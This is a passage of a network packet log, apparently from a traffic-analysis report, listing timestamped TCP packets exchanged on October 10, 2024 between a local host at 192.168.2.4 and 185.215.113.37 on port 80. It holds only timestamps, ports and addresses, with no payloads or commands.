Oct 10, 2024 18:23:19.956382990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956403971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956446886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956446886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956526041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956537962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956562996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956573963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956590891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956590891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956594944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956609964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956624985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956634998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956634998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956662893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956679106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956777096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998517990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998564005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998579025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998620033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998631001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998651981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998651981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998651981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998666048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998696089 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998696089 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998718023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998821974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998836994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998851061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998868942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998871088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998871088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998883009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998899937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.998915911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998915911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.998976946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005342960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005378962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005393982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005467892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005479097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005485058 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005503893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005520105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005526066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005526066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005558968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005558968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005575895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005666018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005681038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005743980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005800009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005811930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005829096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005850077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005863905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005867004 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005867004 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005881071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005896091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005904913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005904913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005937099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005937099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.005940914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005951881 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005970955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.005985022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006007910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006007910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006062031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006139040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006150007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006167889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006181002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006196976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006203890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006203890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006244898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006253004 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006258965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006350994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006361961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006380081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006402969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006402969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006495953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006510973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006526947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006541014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006542921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006542921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006573915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006576061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006591082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006607056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006608009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006623983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006644964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006644964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006695986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006705999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006726027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006736040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006743908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006743908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006755114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006782055 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006782055 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006810904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006822109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006840944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006858110 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006858110 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006889105 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.006912947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006923914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006942034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006956100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.006980896 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007008076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007011890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007025957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007150888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007162094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007181883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007190943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007208109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007210016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007210016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007220984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007241964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007247925 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007247925 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007275105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007285118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007302999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007304907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007304907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007338047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007338047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007653952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007668972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007685900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007699966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.007744074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.007744074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.415507078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.420856953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637449980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637480974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637495995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637507915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.637562037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637576103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637593985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637595892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.637595892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.637737036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637748003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637768984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637772083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.637772083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.637783051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637799978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637813091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.637824059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.637824059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.637989998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638219118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638232946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638248920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638258934 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638269901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638283968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638288021 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638288021 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638300896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638313055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638320923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638320923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638333082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638348103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638360977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638370991 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638370991 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638376951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638389111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638406038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.638425112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638425112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.638510942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.760900021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.760920048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.760938883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761003971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761008978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761008978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761034012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761044979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761053085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761060953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761065006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761071920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761071920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761085987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761101007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761118889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761135101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761135101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761135101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761162043 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761178970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761190891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761209011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761224985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761224985 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761236906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761262894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761262894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761265039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761323929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761358023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761358023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761400938 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761411905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761428118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761440039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761444092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761456966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761462927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761462927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761473894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761488914 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761488914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761518002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761518002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761576891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761591911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761601925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761619091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761636019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761642933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761642933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761653900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761682987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761682987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761729002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761739016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761765957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761775017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761791945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761811972 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761811972 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761816025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761823893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761830091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761843920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761857033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761868954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761868954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761898041 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761898041 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.761979103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.761989117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762006998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762015104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762017012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762026072 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762037992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762062073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762062073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762084007 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762084007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762094021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762111902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762121916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762135983 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762135983 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762217045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762259007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762269020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762285948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762299061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762309074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762309074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762315035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762326002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762325048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762342930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762355089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762371063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.762387037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762387037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.762419939 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885323048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885344028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885360956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885375977 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885484934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885495901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885521889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885521889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885523081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885536909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885552883 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885552883 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885552883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885584116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885584116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885591030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885603905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885620117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885639906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885639906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885658979 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885736942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885750055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885767937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885782957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885787964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885787964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885797024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885821104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885822058 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885926962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885941029 CEST	80	49731	185.215.113.37	192.168.2.4
